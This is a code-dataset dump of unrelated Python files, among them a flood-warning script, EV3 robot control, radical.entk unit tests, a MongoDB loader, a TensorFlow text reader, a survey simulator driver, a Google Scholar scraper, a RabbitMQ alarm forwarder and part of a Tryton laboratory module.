time.sleep(1)\n print(client.get(\"eardrum.memory\"))\n print(\"Client session is closed\")\n\nif __name__ == \"__main__\":\n host = \"localhost\"\n port = 8888\n timeout = 5\n main(host, port, timeout)\n","sub_path":"week_5/parse_mes.py","file_name":"parse_mes.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"478902764","text":"\"\"\" Issue warnings for towns that have stations reading relative water levels\n that indicate possibility for a flood\n\"\"\"\n\nfrom floodsystem.stationdata import build_station_list, update_water_levels\nfrom floodsystem.flood import stations_level_over_threshold\nfrom floodsystem.analysis import flood_warn\nimport operator\n\ndef run():\n\n # Build stations\n stations = build_station_list()\n\n # Update station data\n update_water_levels(stations)\n\n stat_over_thresh = stations_level_over_threshold(stations,1.3)\n\n just_stat_over_thresh = [i[0] for i in stat_over_thresh]\n\n warning_stations = flood_warn(just_stat_over_thresh)\n\n towns_with_warnings = {}\n\n warning_strings = ('No Warning','Low Risk','Moderate Risk',\\\n 'High Risk','Severe Risk')\n\n for station in warning_stations:\n if station.town in towns_with_warnings:\n if station.warning_level > towns_with_warnings[station.town]:\n towns_with_warnings[station.town]=station.warning_level\n else:\n towns_with_warnings[station.town]=station.warning_level\n\n to_del = []\n for town in towns_with_warnings:\n if towns_with_warnings[town]==None or town == None:\n to_del.append(town)\n\n for town in to_del:\n del towns_with_warnings[town]\n\n\n s_towns_with_warnings = sorted(towns_with_warnings.items(),\\\n key=operator.itemgetter(1),reverse=True)\n\n for town in s_towns_with_warnings:\n if town[1] == None:\n continue\n print(\"Town name:\",town[0])\n print(\"Warning level:\",warning_strings[town[1]])\n print(\"\")\n\n\nrun()\n","sub_path":"issue_warnings.py","file_name":"issue_warnings.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"415831120","text":"\n\nfrom xai.brain.wordbase.verbs._scamper import _SCAMPER\n\n#calss header\nclass _SCAMPERED(_SCAMPER, ):\n\tdef __init__(self,): \n\t\t_SCAMPER.__init__(self)\n\t\tself.name = \"SCAMPERED\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"scamper\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_scampered.py","file_name":"_scampered.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"3731416","text":"#!/usr/bin/env python3\n#If you use the infrared sensor in place of the ultrasound sensor then you must modify the code since these sensors use different commands to obtain the sensor reading and since the infrared sensor returns a value that is neither in cm nor in mm. To convert an IR value into a very approximate distance in cm, multiply the IR value by 0.7. For example, if the IR value is 100 then the distance is roughly 70 cm. That means 11 cm corresponds to 16 'IR units' and 5 cm corresponds to 7 'IR units'. Here is the same program, modified for the IR sensor. Changed lines are highlighted.\nfrom ev3dev.ev3 import *\nfrom time import sleep\n\n# Connect infrared sensor to any sensor port\n# and check it is connected.\nir = InfraredSensor() \nassert ir.connected, \"Connect an IR sensor to any sensor port\"\n\n# Put the infrared sensor into proximity mode.\nir.mode = 'IR-PROX'\n\n# Attach large motors to ports B and C\nmB = LargeMotor('outB')\nmC = LargeMotor('outC')\n\n# Record the initial separation of the sensor and the object\nstartdistance = ir.value()\n\n# Advance at 50% speed (speed_sp=450)\nmB.run_forever(speed_sp=-450)\nmC.run_forever(speed_sp=-450)\n\n# Wait until robot has moved (at least) 11 cm closer\n# to the reflecting object in front of it\nwhile ir.value() > 16: # 16 IR units = 11cm approx\n sleep(0.01)\n \n# Turn off the motors and apply the brake\nmB.stop(stop_action=\"brake\")\nmC.stop(stop_action=\"brake\")\nsleep(1)\n\n#turn right\nmB.run_to_rel_pos(position_sp=300, speed_sp=360, stop_action=\"brake\")\nmC.run_to_rel_pos(position_sp=-300, speed_sp=360, stop_action=\"brake\")\nmB.wait_while('running')\nmC.wait_while('running')\n\n#go straight for 6 inches in degrees\nmB.run_to_rel_pos(position_sp=-600, speed_sp=450, stop_action=\"brake\")\nmC.run_to_rel_pos(position_sp=-600, speed_sp=450, stop_action=\"brake\")\nmB.wait_while('running')\nmC.wait_while('running')\n\n#turn left\nmB.run_to_rel_pos(position_sp=-300, speed_sp=360, stop_action=\"brake\")\nmC.run_to_rel_pos(position_sp=300, speed_sp=360, stop_action=\"brake\")\nmB.wait_while('running')\nmC.wait_while('running')\n\n#go straight for 6 inches in degrees\nmB.run_to_rel_pos(position_sp=-600, speed_sp=450, stop_action=\"brake\")\nmC.run_to_rel_pos(position_sp=-600, speed_sp=450, stop_action=\"brake\")\nmB.wait_while('running')\nmC.wait_while('running')\n\n#turn left\nmB.run_to_rel_pos(position_sp=-300, speed_sp=360, stop_action=\"brake\")\nmC.run_to_rel_pos(position_sp=300, speed_sp=360, stop_action=\"brake\")\nmB.wait_while('running')\nmC.wait_while('running')\n\n#go straight for 6 inches in degrees\nmB.run_to_rel_pos(position_sp=-600, speed_sp=450, stop_action=\"brake\")\nmC.run_to_rel_pos(position_sp=-600, speed_sp=450, stop_action=\"brake\")\nmB.wait_while('running')\nmC.wait_while('running')\n\n#turn right\nmB.run_to_rel_pos(position_sp=300, speed_sp=360, stop_action=\"brake\")\nmC.run_to_rel_pos(position_sp=-300, speed_sp=360, stop_action=\"brake\")\nmB.wait_while('running')\nmC.wait_while('running')\n\n#go straight for 6 inches in degrees\nmB.run_to_rel_pos(position_sp=-1600, speed_sp=450, stop_action=\"brake\")\nmC.run_to_rel_pos(position_sp=-1600, speed_sp=450, stop_action=\"brake\")\nmB.wait_while('running')\nmC.wait_while('running') \n\nmB.stop()\nmC.stop()\n","sub_path":"avoid.py","file_name":"avoid.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"479245641","text":"# pylint: disable=protected-access, unused-argument\n# pylint: disable=no-value-for-parameter\n\nfrom unittest import TestCase, mock\n\nimport radical.entk.exceptions as ree\n\nfrom radical.entk.execman.rp import ResourceManager as RPRmgr\n\n\nstage_ins = []\n\n\ndef _pilot_stage_in(sds):\n stage_ins.append(sds)\n\n\ndef _submit_pilot_side_effect(*args):\n mocked_Pilot = mock.MagicMock()\n mocked_Pilot.wait = mock.MagicMock(return_value='hello_from_pilot')\n mocked_Pilot.stage_in = _pilot_stage_in\n return mocked_Pilot\n\n\nclass TestBase(TestCase):\n\n\n # ------------------------------------------------------------------------------\n #\n @mock.patch('radical.utils.generate_id', return_value='rmgr.0000')\n @mock.patch('os.getcwd', return_value='test_folder')\n @mock.patch('radical.utils.Logger')\n @mock.patch('radical.utils.Profiler')\n def test_init(self, mocked_generate_id, mocked_getcwd, mocked_Logger,\n mocked_Profiler):\n\n rmgr = RPRmgr(resource_desc={'resource': 'localhost'},\n sid='test.0000',\n rts_config={\"sandbox_cleanup\": 'test_sandbox',\n \"db_cleanup\": False})\n self.assertIsNone(rmgr._session)\n self.assertIsNone(rmgr._pmgr)\n self.assertIsNone(rmgr._pilot)\n self.assertFalse(rmgr._download_rp_profile)\n\n with self.assertRaises(ree.ValueError):\n RPRmgr(resource_desc={'resource': 'localhost'},\n sid='test.0000',\n rts_config={\"sandbox_cleanup\": 'test_sandbox'})\n\n with self.assertRaises(ree.ValueError):\n RPRmgr(resource_desc={'resource': 'localhost'},\n sid='test.0000', rts_config={\"db_cleanup\": False})\n\n # --------------------------------------------------------------------------\n #\n @mock.patch.object(RPRmgr,'__init__', return_value=None)\n def test_session(self, mocked_init):\n\n rmgr = RPRmgr(resource_desc={'resource': 'localhost'},\n sid='test.0000',\n rts_config={\"sandbox_cleanup\": 'test_sandbox',\n \"db_cleanup\": False})\n rmgr._session = 'test_session'\n self.assertEqual(rmgr.session, 'test_session')\n\n\n @mock.patch.object(RPRmgr,'__init__', return_value=None)\n def test_pmgr(self, mocked_init):\n\n rmgr = RPRmgr(resource_desc={'resource': 'localhost'},\n sid='test.0000',\n rts_config={\"sandbox_cleanup\": 'test_sandbox',\n \"db_cleanup\": False})\n rmgr._pmgr = 'test_pmgr'\n self.assertEqual(rmgr.pmgr, 'test_pmgr')\n\n @mock.patch.object(RPRmgr,'__init__', return_value=None)\n def test_pilot(self, mocked_init):\n\n rmgr = RPRmgr(resource_desc={'resource': 'localhost'},\n sid='test.0000',\n rts_config={\"sandbox_cleanup\": 'test_sandbox',\n \"db_cleanup\": False})\n rmgr._pilot = 'test_pilot'\n self.assertEqual(rmgr.pilot, 'test_pilot')\n\n\n # --------------------------------------------------------------------------\n #\n @mock.patch.object(RPRmgr,'__init__', return_value=None)\n def test_get_resource_allocation_state(self, mocked_init):\n\n rmgr = RPRmgr(resource_desc={'resource': 'localhost'},\n sid='test.0000',\n rts_config={\"sandbox_cleanup\": 'test_sandbox',\n \"db_cleanup\": False})\n rmgr._pilot = mock.Mock()\n rmgr._pilot.state = 'test_state'\n state = rmgr.get_resource_allocation_state()\n self.assertEqual(state, 'test_state')\n\n rmgr = RPRmgr(resource_desc={'resource': 'localhost'},\n sid='test.0000',\n rts_config={\"sandbox_cleanup\": 'test_sandbox',\n \"db_cleanup\": False})\n with self.assertRaises(AttributeError):\n state = rmgr.get_resource_allocation_state()\n\n\n # --------------------------------------------------------------------------\n #\n @mock.patch.object(RPRmgr,'__init__', return_value=None)\n def test_get_completed_states(self, mocked_init):\n\n rmgr = RPRmgr(resource_desc={'resource': 'localhost'},\n sid='test.0000',\n rts_config={\"sandbox_cleanup\": 'test_sandbox',\n \"db_cleanup\": False})\n\n state = rmgr.get_completed_states()\n\n self.assertEqual(state, ['DONE', 'FAILED', 'CANCELED'])\n\n\n # ------------------------------------------------------------------------------\n #\n @mock.patch.object(RPRmgr,'__init__', return_value=None)\n @mock.patch('radical.utils.Logger')\n @mock.patch('radical.utils.Profiler')\n @mock.patch('radical.pilot.Session', return_value='test_session')\n @mock.patch('radical.pilot.PilotDescription', return_value='pilot_desc')\n @mock.patch('radical.pilot.PilotManager', return_value=mock.MagicMock(wait=mock.MagicMock(return_value=True),\n submit_pilots=_submit_pilot_side_effect,\n register_callback=mock.MagicMock(return_value=True)))\n def test_submit_resource_request(self, mocked_init, mocked_Logger,\n mocked_Profiler, mocked_Session,\n mocked_PilotDescription,\n mocked_PilotManager):\n\n rmgr = RPRmgr()\n rmgr._logger = mocked_Logger\n rmgr._prof = mocked_Profiler\n rmgr._uid = 'rmgr.0000'\n rmgr._sid = 'rmgr.0000'\n rmgr._rts_config = {'sandbox_cleanup': False}\n rmgr._resource = 'test_resource'\n rmgr._walltime = 30\n rmgr._cpus = 1\n rmgr._project = 'test_project'\n rmgr._gpus = 1\n rmgr._access_schema = 'test_access'\n rmgr._queue = 'test_queue'\n rmgr._shared_data = 'test_data'\n rmgr._outputs = 'test_outputs'\n rmgr._job_name = None\n rmgr._shared_data = ['test/file1.txt > file1.txt', 'file2.txt']\n\n rmgr.submit_resource_request()\n self.assertEqual(rmgr._session, 'test_session')\n self.assertEqual(stage_ins[0], [{'action': 'Transfer',\n 'source': 'test/file1.txt',\n 'target': 'file1.txt'},\n {'action': 'Transfer',\n 'source': 'file2.txt',\n 'target': 'file2.txt'}\n ])\n\n\n # ------------------------------------------------------------------------------\n #\n @mock.patch.object(RPRmgr,'__init__', return_value=None)\n @mock.patch('radical.utils.Logger')\n @mock.patch('radical.utils.Profiler')\n def test_get_rts_info(self, mocked_init, mocked_Logger,\n mocked_Profiler):\n rmgr = RPRmgr()\n rmgr._logger = mocked_Logger\n rmgr._prof = mocked_Profiler\n rmgr._pilot = mock.Mock()\n rmgr._pilot.as_dict = mock.MagicMock(return_value={'pilot': 'pilot.0000'})\n\n self.assertEqual(rmgr.get_rts_info(), {'pilot': 'pilot.0000'})\n","sub_path":"tests/test_component/test_rmgr_rp.py","file_name":"test_rmgr_rp.py","file_ext":"py","file_size_in_byte":7377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"148098119","text":"# Adapted from: https://lincolnloop.com/blog/2008/mar/25/serving-django-cherrypy/.\n\nimport os\nfrom django.core.management.base import BaseCommand\n\nfrom bmds_server.wsgi import application\nfrom cherrypy import wsgiserver\n\n\nHELP_TEXT = \"\"\"Serve application using CherryPy WSGI server.\"\"\"\n\n\nclass Command(BaseCommand):\n\n help = HELP_TEXT\n\n def handle(self, *args, **options):\n\n # Added to environment by IIS\n port = int(os.environ.get('HTTP_PLATFORM_PORT', 8000))\n\n server = wsgiserver.CherryPyWSGIServer(\n ('0.0.0.0', port),\n application\n )\n\n server.start()\n","sub_path":"jobrunner/management/commands/run_cherrypy_server.py","file_name":"run_cherrypy_server.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"265151428","text":"'''\n利用pymongo 将json文件插入MongoDB方法封装\n'''\nfrom pymongo import MongoClient\nimport json\nclass JsonToMongo(object):\n # 初始化数据库连接\n def __init__(self, host, port, dbName, collectionName, filename):\n # 创建MongoDB客户端\n self.client = MongoClient(host, port)\n # 创建或者连接数据库\n self.db = self.client.get_database(dbName)\n # 创建集合或使用集合\n self.collection = self.db.get_collection(collectionName)\n self.filename = filename\n # 读取json文件\n def open_json(self):\n self.file = open(self.filename, 'r')\n # 关闭文件\n def close_file(self):\n self.file.close()\n # 查询方法\n def query(self, commend):\n result = self.collection(commend)\n return result\n # 写入数据库\n def insert_mongo(self):\n self.open_json()\n # 加载json文件\n data =json.load(self.file)\n\n try:\n self.collection.insert(data)\n print('写入%s成功!'%self.filename)\n except Exception as e:\n print(e)\n finally:\n self.close_file()\n \nif __name__ =='__main__':\n j2m = JsonToMongo('localhost', 27017, 'test_db', 'test_collection', 'gkgSppProcessData.json')\n j2m.insert_mongo()\n","sub_path":"HCC/json2mongo.py","file_name":"json2mongo.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"192969216","text":"#coding:utf-8\n\n# Copyright 2015 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\n\"\"\"Utilities for parsing text files.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport os\n\nimport numpy as np\nimport tensorflow as tf\n\ndef _testread_words(filename):\n lines=[]\n docid=[]\n for line in open(filename,'r'):\n if len(line)>20:\n lines.append(' '.join(line.split(' ')[1:-1]))\n docid.append(line.split(' ')[0])\n return ' '.join(lines).split(),docid\n\n\ndef _read_words(filename):\n lines=[]\n for line in open(filename,'r'):\n lines.append( line.strip())\n return ' '.join(lines).split()\n\ndef _build_vocab(filename):\n data = _read_words(filename)\n counter = collections.Counter(data)\n count_pairs = sorted(counter.items(), key=lambda x: (-x[1], x[0]))\n words, _ = list(zip(*count_pairs))\n word_to_id = dict(zip(words, range(len(words))))\n out = open('vocab','w')\n for key in word_to_id:\n out.write(key)\n out.write(' ')\n out.write(str(word_to_id[key]))\n out.write('\\n')\n \n out.close() \n return word_to_id\n\n\ndef _testfile_to_word_ids(filename, word_to_id):\n data ,docid = _testread_words(filename)\n file2id = []\n for word in data:\n if word_to_id.has_key(word):\n file2id.append(word_to_id[word])\n# return [word_to_id[word] for word in data]\n return file2id, docid\n\n\ndef _file_to_word_ids(filename, word_to_id):\n data = _read_words(filename)\n file2id = []\n for word in data:\n if word_to_id.has_key(word):\n file2id.append(word_to_id[word])\n# return [word_to_id[word] for word in data]\n return file2id\n\ndef ptb_raw_data(data_path=None):\n \"\"\"\n Args:\n data_path: string path to the directory where simple-examples.tgz has\n been extracted.\n\n Returns:\n tuple (train_data, vocabulary)\n where each of the data objects can be passed to PTBIterator.\n \"\"\"\n\n train_path = os.path.join(data_path, \"tmp_hcxw_pre.txt\")\n\n\n word_to_id = _build_vocab(train_path)\n train_data = _file_to_word_ids(train_path, word_to_id)\n vocabulary = len(word_to_id)\n return train_data, word_to_id\n\n\ndef ptb_iterator(raw_data, batch_size, num_steps):\n \"\"\"\n Args:\n raw_data: one of the raw data outputs from ptb_raw_data.\n batch_size: int, the batch size.\n num_steps: int, the number of unrolls.\n\n Yields:\n Pairs of the batched data, each a matrix of shape [batch_size, num_steps].\n The second element of the tuple is the same data time-shifted to the\n right by one.\n\n Raises:\n ValueError: if batch_size or num_steps are too high.\n \"\"\"\n raw_data = np.array(raw_data, dtype=np.int32)\n data_len = len(raw_data)\n batch_len = data_len // batch_size\n\n data = np.zeros([batch_size, batch_len], dtype=np.int32)\n for i in range(batch_size):\n #固定一个batch_len大小的窗口向后滑动\n data[i] = raw_data[batch_len * i:batch_len * (i + 1)]\n\n #一个batch里有多少个句子\n #num_steps是单个数据中序列的长度\n epoch_size = (batch_len - 1) // num_steps\n\n if epoch_size == 0:\n raise ValueError(\"epoch_size == 0, decrease batch_size or num_steps\")\n\n for i in range(epoch_size):\n x = data[:, i*num_steps:(i+1)*num_steps]\n y = data[:, i*num_steps+1:(i+1)*num_steps+1]\n yield (x, y)\n\n\ndef ptb_iterator_test(datapath):\n \n test_path = os.path.join(datapath, \"tmp_cc_4w_bw_h2_pre\")\n word_to_id=dict()\n for line in open('vocab','r'):\n key = line.split(' ')[1].strip('\\n')\n value = line.split(' ')[0]\n word_to_id[value]=int(key)\n\n data,dataid = _testfile_to_word_ids(test_path, word_to_id)\n cnt = 0 \n data_p=[]\n for j in range(len(data)):\n if word_to_id[''] == data[j]:\n yield (dataid[cnt],data_p)\n data_p=[]\n cnt += 1\n else:\n data_p.append(data[j])\n\ndef addition_info(vocabname, additionname):\n char2info = dict()\n for line in open(additionname,'r'):\n l = len(line.split(' '))\n key = [k.strip('\\n') for k in line.split(' ')[1:l]]\n #key = line.split(' ')[1:l]\n value = line.split(' ')[0].strip()\n char2info[value]=key\n addition_info = dict()\n for line in open(vocabname, 'r'):\n key = int(line.split(' ')[1].strip('\\n'))\n value = line.split(' ')[0].strip()\n if char2info.has_key(value):\n addition_info[key] = char2info[value]\n else:\n addition_info[key] = ['-0.001','-0.001']\n #counter = collections.Counter(addition_info)\n #count_pairs = sorted(counter.items(), key = lambda x:(x[1], x[0]))\n #keys, values = list(zip(*count_pairs))\n #return map(list, zip(*[values]))\n return [addition_info[k] for k in sorted(addition_info.keys())]\n\n\n","sub_path":"RNN/tensorflow_reader.py","file_name":"tensorflow_reader.py","file_ext":"py","file_size_in_byte":5344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"461895389","text":"#! /usr/bin/env python\n\nimport sys\nfrom random import random, gauss\nimport numpy as np\nimport math\n\n\nimport SurveySubs\nimport ssimTools as ss\nimport GiMeObj as go\n\ndrad = np.pi/180.0\n\n\n\n# Read in driver arguments\nwith open ('input.file','r') as f:\n tmp = f.read().split()\n distri_file = tmp[1] # Name of model file for GiMeObj \n fsize = tmp[0] # Number of rows in file\n\nwith open('seeds.txt','r') as f:\n seed = int(f.read()) # Seed for random number generator\n\nwith open('number_to_track.txt','r') as f:\n n_track_max = int(f.readline()) # Number of objects to track\n\nwith open('number_to_detect.txt','r') as f:\n n_detect_max = int(f.readline()) # Number of objects to track \n\nwith open ('surveydir.txt','r') as f:\n survey_dir = f.read().split()[0] # Path to directory containing the characterization files\n\ndetect_file = 'detections.dat' # Output file for detections\ntrack_file = 'tracked.dat' # Output file for tracked objects\n\ngo.setRand(seed)\nss.setRand(seed)\n\nf_detect = ss.detFile(detect_file, seed) # set-up the detection file comments in OSSOS format\nf_track = ss.trackFile(track_file) # set-up the tracked file comments in OSSOS format\n\n\ndrawn = open('drawn.dat','w') # the first 5000 objects drawn\n\ndrawn.write('# a\\t\\te\\t\\tinc\\t\\tnode\\t\\tperi\\t\\tManom\\t\\tH\\t\\tresamp \\n')\n\nkeep_going = True\nn_iter, n_hits, n_track = 0, 0, 0\n\n#n_track_max=2\n\n# I believe this is envisioned as a comment for the kind of object returned by GiMeObj\ncomments = 'res'\n\nwhile keep_going:\n\n # Draw an object \n a,e,inc,node,peri,M,epoch,h,color,gb,ph,period,amp,resamp = go.GiMeObj(distri_file)\n\n # Write out the first 5000 objects to a file to give a small representative sample\n if n_iter <5000:\n drawn.write(str(a)+'\\t'+str(e)+'\\t'+str(inc/drad)+'\\t'+str(node/drad)+'\\t'+str(peri/drad)+'\\t'+str(M/drad)+'\\t'+str(h)+'\\t'+str(resamp)+'\\n')\n\n # Counter: advantage of Python over Fortran: integers can be of any value\n # There is no limit at 2**31-1.\n n_iter += 1\n\n # Call the survery simulator\n # The output seed2 is never used, but is returned by Fortran so it is stored\n seed2,flag,ra,dec,d_ra,d_dec,r,delta,m_int,m_rand,eff,isur,mt,epochp,ic,surna,h_rand = SurveySubs.detos1(a,e,inc,node,peri,M,epoch,h,color,gb,ph,period,amp,survey_dir,seed)\n\n # Condition for CFEPS objects with d<20\n if (flag > 0) and ((surna[0]=='L') or (surna[0]=='p')) and (r<20):\n continue\n\n\n # If an object is detected, flag > 0\n if flag > 0:\n n_hits += 1\n # Write the detected object out to the detected in the OSSOS format\n ss.detWrite(detect_file, a, e, inc, node, peri, M, resamp, r, mt, m_rand, h_rand, color, ic, flag, delta, m_int, h, eff, ra, dec, d_ra, d_dec, surna, comments)\n # If an object is also tracked\n if (flag > 2) and (np.mod(flag,2) == 0):\n n_track += 1\n # Write the detected object out to the tracked file in the OSSOS format\n ss.trackWrite(track_file, a, e, inc, node, peri, M, resamp, r, mt, m_rand, h_rand, color, ic, comments)\n\n\n # break for detections file\n if ((n_detect_max > 0) & (n_hits >= n_detect_max)) | ((n_detect_max < 0) & (n_iter >= -n_track_max)):\n keep_going = False\n\n\n\n\n # If the break condition of max tracked or max observed is reached\n if ((n_track_max > 0) & (n_track >= n_track_max)) | ((n_track_max < 0) & (n_iter >= -n_track_max)):\n keep_going = False\n\n\n# Done going through model. Write out summary and quit\nss.detSuffix(detect_file, n_iter, n_hits, n_track)\n\n\n","sub_path":"Driver.py","file_name":"Driver.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"499375680","text":"import scholarly\nproxies = {'http' : 'socks5://127.0.0.1:9050', 'https': 'socks5://127.0.0.1:9050'}\nscholarly.scholarly.use_proxy(**proxies)\nraw_results = scholarly.search_pubs_query('china virus')\nfirst_result = next(raw_results)\n\nprint(first_result.bib)\n##\n\n\nfrom elasticsearch import Elasticsearch\nimport scholarly\nimport time\nfrom spacy import displacy\nimport en_core_web_sm\nnlp = en_core_web_sm.load()\nfrom wordcloud import WordCloud\n\n##\n# SCRAPE\nresults = []\nfor index, result in enumerate(scholarly.search_pubs_query('china virus')):\n results.append(result.bib)\n if index > 3: break\nclob = '. '.join(['. '.join(r.values()) for r in results])\n\n##\nwordcloud = WordCloud(background_color=\"white\", max_words=5000, contour_width=3, contour_color='steelblue')\nwordcloud.generate(clob)\nimg = wordcloud.to_image()\n##\ndisplacy.render(nlp(big_clob), style='ent', jupyter=False)\n##\n# Connect to the elastic cluster\nes = Elasticsearch([{'host': 'localhost', 'port': 9200}])\nprint(es)\n\n##\ndef print_process(search_terms, limit=3, wait_time=30):\n # .search_author .search_keyword\n n = 0\n search = scholarly.search_pubs_query(search_terms)\n for result in search:\n n += 1\n result = result.bib\n abstract = result['abstract']\n tokens = nltk.word_tokenize(result)\n tagl = nltk.pos_tag(tokens)\n # NER the abstract\n # Topic Model the abstract\n\n\n res = es.index(index='scholar_scrape', doc_type='scholar_search', id=result['url'], body=result)\n print(result)\n if n >= limit:\n break\n\n time.sleep(wait_time)\n\n\nprint_process('virus china', limit=100, wait_time=10)\n\n# Retrieve the author's data, fill-in, and print\nsearch_query = scholarly.search_author('Steven A Cholewiak')\nauthor = next(search_query).fill()\nprint(author)\n\n# Print the titles of the author's publications\nprint([pub.bib['title'] for pub in author.publications])\n\n# Take a closer look at the first publication\npub = author.publications[0].fill()\nprint(pub)\n\n# Which papers cited that publication?\nprint([citation.bib['title'] for citation in pub.get_citedby()])\n","sub_path":"scholar_elk.py","file_name":"scholar_elk.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"56936546","text":"#!/usr/bin/env python\nimport pika\nimport json\nimport socket\nimport os\n\nRABBIT_MQ_SERVER = os.environ[\"RABBIT_MQ_SERVER\"]\nRABBIT_MQ_USER = os.environ[\"RABBIT_MQ_USER\"]\nRABBIT_MQ_PWD = os.environ[\"RABBIT_MQ_PWD\"]\n\ncredentials = pika.PlainCredentials(RABBIT_MQ_USER, RABBIT_MQ_PWD)\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters(\n RABBIT_MQ_SERVER, credentials = credentials))\nchannel = connection.channel()\n\ndef callback(ch, method, properties, body):\n req = json.loads(body)\n\n status = req[\"monitor\"][\"result\"][\"status\"]\n if status != \"ok\" :\n key = req[\"monitor\"][\"notifier\"][\"type\"]\n resp = json.dumps(req)\n channel.basic_publish(exchange='notifiers',\n routing_key=key,\n body=resp)\n\nchannel.basic_consume(callback,\n queue='results',\n no_ack=True)\nchannel.start_consuming()\n","sub_path":"monitor-alarm.py","file_name":"monitor-alarm.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"362485548","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/trytond/modules/lims/analysis.py\n# Compiled at: 2019-01-16 09:41:18\n# Size of source mod 2**32: 93905 bytes\nimport logging, operator\nfrom datetime import datetime\nfrom decimal import Decimal\nfrom sql import Literal\nfrom trytond.model import Workflow, ModelView, ModelSQL, fields, Unique\nfrom trytond.wizard import Wizard, StateTransition, StateView, StateAction, Button\nfrom trytond.pool import Pool\nfrom trytond.transaction import Transaction\nfrom trytond.pyson import PYSONEncoder, Eval, Equal, Bool, Not, Or, And\n__all__ = [\n 'ProductType', 'Matrix', 'Formula', 'FormulaVariable', 'Analysis',\n 'Typification', 'TypificationAditional', 'TypificationReadOnly',\n 'CalculatedTypification', 'CalculatedTypificationReadOnly',\n 'AnalysisIncluded', 'AnalysisLaboratory', 'AnalysisLabMethod',\n 'AnalysisDevice', 'CopyTypificationStart', 'CopyTypification',\n 'CopyCalculatedTypificationStart', 'CopyCalculatedTypification',\n 'RelateAnalysisStart', 'RelateAnalysis', 'CreateAnalysisProduct',\n 'OpenTypifications', 'AddTypificationsStart', 'AddTypifications',\n 'RemoveTypificationsStart', 'RemoveTypifications']\n\nclass Typification(ModelSQL, ModelView):\n \"\"\"Typification\"\"\"\n __name__ = 'lims.typification'\n product_type = fields.Many2One('lims.product.type', 'Product type', required=True,\n select=True,\n states={'readonly': Bool(Eval('id', 0) > 0)})\n matrix = fields.Many2One('lims.matrix', 'Matrix', required=True, select=True,\n states={'readonly': Bool(Eval('id', 0) > 0)})\n analysis = fields.Many2One('lims.analysis', 'Analysis', required=True, domain=[\n ('state', '=', 'active'),\n ('type', '=', 'analysis'),\n ('behavior', '!=', 'additional')],\n select=True,\n states={'readonly': Bool(Eval('id', 0) > 0)})\n method = fields.Many2One('lims.lab.method', 'Method', required=True, domain=[\n (\n 'id', 'in', Eval('method_domain'))],\n depends=[\n 'method_domain'],\n select=True)\n method_view = fields.Function((fields.Many2One('lims.lab.method', 'Method')), 'get_views_field',\n searcher='search_views_field')\n method_domain = fields.Function(fields.Many2Many('lims.lab.method', None, None, 'Method domain'), 'on_change_with_method_domain')\n detection_limit = fields.Float('Detection limit', digits=(\n 16, Eval('limit_digits', 2)),\n depends=['limit_digits'])\n quantification_limit = fields.Float('Quantification limit', digits=(\n 16, Eval('limit_digits', 2)),\n depends=['limit_digits'])\n limit_digits = fields.Integer('Limit digits')\n check_result_limits = fields.Boolean('Validate limits directly on the result')\n initial_concentration = fields.Char('Initial concentration')\n start_uom = fields.Many2One('product.uom', 'Start UoM', domain=[\n ('category.lims_only_available', '=', True)])\n final_concentration = fields.Char('Final concentration')\n end_uom = fields.Many2One('product.uom', 'End UoM', domain=[\n ('category.lims_only_available', '=', True)])\n default_repetitions = fields.Integer('Default repetitions', required=True)\n technical_scope_versions = fields.Function(fields.One2Many('lims.technical.scope.version', None, 'Technical scope versions'), 'get_technical_scope_versions')\n comments = fields.Text('Comments')\n additional = fields.Many2One('lims.analysis', 'Additional analysis', domain=[\n ('state', '=', 'active'), ('behavior', '=', 'additional')])\n additionals = fields.Many2Many('lims.typification-analysis', 'typification',\n 'analysis', 'Additional analysis', domain=[\n (\n 'id', 'in', Eval('additionals_domain'))],\n depends=[\n 'additionals_domain'])\n additionals_domain = fields.Function(fields.Many2Many('lims.analysis', None, None, 'Additional analysis domain'), 'on_change_with_additionals_domain')\n by_default = fields.Boolean('By default')\n calc_decimals = fields.Integer('Calculation decimals', required=True)\n report = fields.Boolean('Report')\n report_type = fields.Selection([\n ('normal', 'Normal'),\n ('polisample', 'Polisample')],\n 'Report type',\n sort=False)\n report_result_type = fields.Selection([\n ('result', 